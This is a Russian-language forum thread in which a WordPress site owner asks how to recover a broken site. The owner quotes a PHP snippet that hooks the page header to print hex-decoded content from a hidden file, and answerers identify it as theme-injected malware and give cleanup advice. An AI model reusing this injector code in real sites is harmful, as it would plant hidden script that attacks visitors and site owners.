Как восстановить сайт?

Question

[Mark116]

Как можно исправить ситуацию? 1) не заходит в админку, 2) то товары в корзину не падают и 3) ошибка в хедере сайта

if ((is_admin() || (function_exists('get_hex_cache'))) !== true)
{ add_action('wp_head', 'get_hex_cache', 12); 
function get_hex_cache() { return print(@hex2bin( '3c7' . 
(file_get_contents(__DIR__ .'/_inc.tmp')))); } } " "

Comments

[rPman]

если это кусок вордпреса, то я в шоке, такой говнокод

[Дмитрий]

Сервер не видит интепритатор, отдаёт код как текст.

[rPman]

Дмитрий, это да, но именно это позволило увидеть код вируса, иначе он был бы незаметным

Answer 1

[rPman]

Выглядит как плохо установившийся вирус.

Советую найти специалиста который проанализирует способ проникновения и закроет дыру, после восстанавливать из бакапа

Answer 2

[fStrange]

Это однозначно вирус. Классический способ подключения через тему.
Если есть бекап на хостинге, откатить сайт до рабочей версии. Затем обновить Wordpress и плагины. Сменить пароли в админку.
Если сайт в начальной стадии заражения этого может хватить.

Answer 3

[R4ZΞ]

Как выше уже написали, это малварь. Если вы на шареде держите сайт, то вариант с бэкапом будет оптимальным решением. Дальше - обновлять движок, плагины, тему + менять пароли. Если не на шареде, то логично будет разобраться что конкретно и где делает этот код, как сильно, простите, "натянули" ваш сайт. Если произошло всё это недавно, то не лишним будет и логи посмотреть.